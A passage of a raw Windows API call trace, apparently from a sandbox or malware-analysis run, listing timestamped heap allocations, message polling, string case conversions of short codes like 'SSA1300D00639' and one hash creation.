[0252.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.778] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.778] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.778] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0252.778] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.779] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0252.779] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.779] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.779] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.779] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.780] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.780] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.780] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0252.780] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.780] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0252.780] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.780] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.780] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.781] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.781] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0252.781] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.781] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0252.781] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0252.781] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.782] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0252.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.783] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0252.783] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.783] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0252.783] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.783] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0252.783] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.783] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0252.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.784] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.784] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.784] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0252.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.784] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.784] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.784] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0252.785] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.785] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0252.785] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.785] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.785] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.785] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.785] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.785] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.786] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.786] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0252.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0252.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.786] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.786] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.786] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0252.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0252.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.787] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0252.787] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0252.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0252.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0252.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.787] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0252.787] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.787] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0252.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0252.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0252.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.787] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0252.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.788] CryptCreateHash (in: hProv=0xad31c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0252.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0252.788] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0252.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.789] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.789] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.789] RtlAllocateHeap 